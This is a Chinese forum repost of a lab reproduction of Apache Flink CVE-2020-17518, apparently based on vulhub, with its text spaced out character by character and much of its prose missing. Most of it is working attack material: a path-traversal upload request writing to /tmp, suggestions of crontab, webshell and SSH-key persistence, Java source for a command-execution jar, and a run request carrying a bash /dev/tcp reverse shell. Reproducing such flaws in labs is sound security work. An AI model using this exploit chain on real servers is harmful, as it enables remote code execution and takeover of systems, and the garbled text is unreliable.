搜索

[2049] 2021-01-19_漏洞复现ApacheFlinkCVE-2020-17518

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2021-01-19_漏洞复现ApacheFlinkCVE-2020-17518   A p a c h e   F l i n k   C V E - 2 0 2 0 - 1 7 5 1 8   d o n 9   d o n 9 s e c   2 0 2 1 - 0 1 - 1 9   #   , 1 9 F l i n k   1 d o c k e r - c o m p o s e   u p   - d h t t p : / / y o u r - i p : 8 0 8 1 P O S T   / j a r s / u p l o a d   H T T P / 1 . 1 H o s t :   1 . 1 . 1 . 1 : 8 0 8 1 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 7 . 0 . 4 2 8 0 . 8 8   S a f a r i / 5 3 7 . 3 6 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y C o n t e n t - L e n g t h :   1 8 5 - - - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " j a r f i l e " ;   f i l e n a m e = " . . / . . / . . / . . / . . / . . / t m p / d o n 9 s e c "
姿 ( ) s h e l l - p d o c k e r c r o n t a b c r o n t a b . d o n 9 s e c - - - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y - - w e b s h e l l c r o n s s h   k e y j a r #     c r o n t a b a p t - g e t   u p d a t e   & &   a p t - g e t   - y   i n s t a l l   c r o n s e r v i c e   c r o n   s t a r t
j a r s h e l l - j a r j a r F l i n k / t m p   / j o b m a n a g e r / c o n f i g   w e b . t m p d i r i m p o r t   j a v a . i o . F i l e ; i m p o r t   j a v a . u t i l . S c a n n e r ; p u b l i c   c l a s s   E x e c u t e   {       p u b l i c   E x e c u t e ( )   {       }       p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   E x c e p t i o n   {               S t r i n g   o   =   " " ;               S t r i n g   c m d   =   a r g s [ 0 ] ;               P r o c e s s B u i l d e r   p ;               i f   ( S y s t e m . g e t P r o p e r t y ( " o s . n a m e " ) . t o L o w e r C a s e ( ) . c o n t a i n s ( " w i n " ) )   {                       p   =   n e w   P r o c e s s B u i l d e r ( n e w   S t r i n g [ ] { " c m d . e x e " ,   " / c " ,   c m d } ) ;               }   e l s e   {                       S t r i n g   p t y   =   " / b i n / s h " ;                       i f   ( ( n e w   F i l e ( " / b i n / b a s h " ) ) . e x i s t s ( ) )   {                               p t y   =   " / b i n / b a s h " ;                       }                       p   =   n e w   P r o c e s s B u i l d e r ( n e w   S t r i n g [ ] { p t y ,   " - c " ,   c m d } ) ;               }               P r o c e s s   s   =   p . s t a r t ( ) ;               S c a n n e r   c   =   ( n e w   S c a n n e r ( s . g e t I n p u t S t r e a m ( ) ) ) . u s e D e l i m i t e r ( " A " ) ;               c . c l o s e ( ) ;       } } j a v a c   E x e c u t e . j a v a j a r   c f   e x e c S h e l l . j a r   E x e c u t e . c l a s s
/ j a r s / u p l o a d j a r   - >   p a s t e   f r o m   f i l e j a r s h e l l s h e l l , : / j a r s / s h e l l . j a r / r u n ? e n t r y - c l a s s = E x e c u t e & p r o g r a m - a r g s = ' / b i n / b a s h + - i + > % 2 6 + / d e v / t c p / 0 . 0 . 0 . 0 / 9 9 9 9 + 0 > % 2 6 1 '
p o c h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / t r e e / m a s t e r / f l i n k / C V E - 2 0 2 0 - 1 7 5 1 8 h t t p s : / / n o s e c . o r g / h o m e / d e t a i l / 4 6 3 9 . h t m l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理